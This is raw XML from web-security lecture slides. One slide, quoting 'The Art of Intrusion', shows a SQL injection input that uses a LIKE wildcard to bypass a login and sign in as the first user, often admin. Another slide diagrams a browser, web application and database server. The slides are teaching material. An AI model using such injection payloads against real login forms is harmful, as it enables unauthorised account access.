              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Another SQL Injection Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1305603" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B792FFA-E654-584C-A384-9A37E48DDDE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066799" y="2103120"/>
            <a:ext cx="10571739" cy="3849624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>To authenticate logins, server runs this SQL command against the user DB:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        SELECT * WHERE user=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>User enters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ OR WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> LIKE ‘%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>as both </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Server executes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       SELECT * WHERE user=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ OR WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> LIKE ‘%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ OR WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> LIKE ‘%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Logs in with the credentials of the first person in the database (typically, admin!)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1305605" name="AutoShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5D5ABC5-3502-B241-8B1E-5ED7A821758B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7551761" y="4779037"/>
            <a:ext cx="2976196" cy="313932"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -71794"/>
              <a:gd name="adj2" fmla="val -19588"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF99CC"/>
          </a:solidFill>
          <a:ln w="1270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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Wildcard matches </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0556AF20-EF90-7C4B-A373-4C5D93384D5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9151961" y="6046129"/>
            <a:ext cx="2486578" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>From ”The Art of Intrusion”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3849239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56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560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56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56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05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60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44030E1-90DD-8F4C-84E3-26377FF44154}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Server Side of a Web Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B293B82F-4839-AA4A-BE07-5A9984225A89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="788831" y="3123128"/>
            <a:ext cx="1752600" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EAEAEA"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="non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en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1434628" name="Line 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9D03DC1-51DF-6D49-87E3-9E3DF4739AF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2535728" y="3718775"/>
            <a:ext cx="2743200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>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35845" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F144428-1E1F-8D41-9976-43056A9A97AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5278928" y="3261575"/>
            <a:ext cx="2362200" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="non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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1434630" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E0722D5-ECCB-AF4C-A187-1332CE397314}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2981014" y="3735223"/>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type="none" w="lg" len="me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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>GET / HTTP/1.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1434631" name="Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3173910-145E-7F4B-AC9D-03FD762E1605}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2535728" y="4175975"/>
            <a:ext cx="274320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US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1434632" name="Text Box 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D7D6612-A9B5-3A44-BFA9-0A77BA712DF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3020415" y="4314423"/>
            <a:ext cx="16049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type="none" w="lg" len="me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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>HTTP/1.1 200 OK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35849" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB24C5BF-9326-E944-8092-00B330F05AA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1058751" y="3750975"/>
            <a:ext cx="533399" cy="53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Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3689042C-7770-E040-8534-CAD66CA441DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1755619" y="3805340"/>
            <a:ext cx="557212" cy="34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Picture 11" descr="firefox">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5E3457E-763E-6D45-B817-DF8D6953D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632" y="4404241"/>
            <a:ext cx="48115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12" descr="opera">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2259BCA9-295C-FC48-B66B-E85AECDB7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231" y="4404241"/>
            <a:ext cx="50255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37" name="AutoShape 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C44F11F-69AD-3F4D-9A32-48FDA2617509}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6048235" y="4576485"/>
            <a:ext cx="1518970" cy="517526"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 12500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35856" name="Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48FD89C5-FB52-EA46-A851-EB871C06CDCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8736168" y="3261575"/>
            <a:ext cx="2362200" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="non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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="Microsoft SQL Server Vector Logo - Logowik.com">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC1AAEA5-2C92-D247-8C4C-DE59B9CA6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8625" y="3328587"/>
            <a:ext cx="666258" cy="499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 arrow&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A05F8DB8-E471-9241-8EF1-09D92E6D5FD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10551103" y="4404241"/>
            <a:ext cx="461963" cy="461963"/>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FEFC56AC-7D76-3944-9DF8-0F9D430C2E02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6807720" y="3342534"/>
            <a:ext cx="720040" cy="363220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26FC1706-9959-314C-87C2-1AADCAFF81C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6807720" y="2035947"/>
            <a:ext cx="2362200" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Runs on a Web server (application server)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16D59510-9AE5-7C4E-A662-512BC53CA89B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3444242" y="2086257"/>
            <a:ext cx="1834686" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
